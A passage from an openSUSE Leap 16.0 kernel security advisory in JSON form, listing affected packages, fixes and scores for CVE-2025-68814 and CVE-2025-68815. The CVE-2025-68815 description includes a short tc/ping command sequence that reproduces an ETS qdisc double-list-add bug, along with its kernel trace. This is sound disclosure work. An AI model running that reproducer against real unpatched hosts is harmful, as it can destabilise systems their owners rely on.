"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68814",
"url": "https://www.suse.com/security/cve/CVE-2025-68814"
},
{
"category": "external",
"summary": "SUSE Bug 1256651 for CVE-2025-68814",
"url": "https://bugzilla.suse.com/1256651"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68814"
},
{
"cve": "CVE-2025-68815",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68815"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Remove drr class from the active list if it changes to strict\n\nWhenever a user issues an ets qdisc change command, transforming a\ndrr class into a strict one, the ets code isn\u0027t checking whether that\nclass was in the active list and removing it. This means that, if a\nuser changes a strict class (which was in the active list) back to a drr\none, that class will be added twice to the active list [1].\n\nDoing so with the following commands:\n\ntc qdisc add dev lo root handle 1: ets bands 2 strict 1\ntc qdisc add dev lo parent 1:2 handle 20: \\\n tbf rate 8bit burst 100b latency 1s\ntc filter add dev lo parent 1: basic classid 1:2\nping -c1 -W0.01 -s 56 127.0.0.1\ntc qdisc change dev lo root handle 1: ets bands 2 strict 2\ntc qdisc change dev lo root handle 1: ets bands 2 strict 1\nping -c1 -W0.01 -s 56 127.0.0.1\n\nWill trigger the following splat with list debug turned on:\n\n[ 59.279014][ T365] ------------[ cut here ]------------\n[ 59.279452][ T365] list_add double add: new=ffff88801d60e350, prev=ffff88801d60e350, next=ffff88801d60e2c0.\n[ 59.280153][ T365] WARNING: CPU: 3 PID: 365 at lib/list_debug.c:35 __list_add_valid_or_report+0x17f/0x220\n[ 59.280860][ T365] Modules linked in:\n[ 59.281165][ T365] CPU: 3 UID: 0 PID: 365 Comm: tc Not tainted 6.18.0-rc7-00105-g7e9f13163c13-dirty #239 PREEMPT(voluntary)\n[ 59.281977][ T365] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011\n[ 59.282391][ T365] RIP: 0010:__list_add_valid_or_report+0x17f/0x220\n[ 59.282842][ T365] Code: 89 c6 e8 d4 b7 0d ff 90 0f 0b 90 90 31 c0 e9 31 ff ff ff 90 48 c7 c7 e0 a0 22 9f 48 89 f2 48 89 c1 4c 89 c6 e8 b2 b7 0d ff 90 \u003c0f\u003e 0b 90 90 31 c0 e9 0f ff ff ff 48 89 f7 48 89 44 24 10 4c 89 44\n...\n[ 59.288812][ T365] Call Trace:\n[ 59.289056][ T365] \u003cTASK\u003e\n[ 59.289224][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.289546][ T365] ets_qdisc_change+0xd2b/0x1e80\n[ 59.289891][ T365] ? __lock_acquire+0x7e7/0x1be0\n[ 59.290223][ T365] ? __pfx_ets_qdisc_change+0x10/0x10\n[ 59.290546][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.290898][ T365] ? __mutex_trylock_common+0xda/0x240\n[ 59.291228][ T365] ? __pfx___mutex_trylock_common+0x10/0x10\n[ 59.291655][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.291993][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.292313][ T365] ? trace_contention_end+0xc8/0x110\n[ 59.292656][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293022][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293351][ T365] tc_modify_qdisc+0x63a/0x1cf0\n\nFix this by always checking and removing an ets class from the active list\nwhen changing it to strict.\n\n[1] https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/tree/net/sched/sch_ets.c?id=ce052b9402e461a9aded599f5b47e76bc727f7de#n663",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
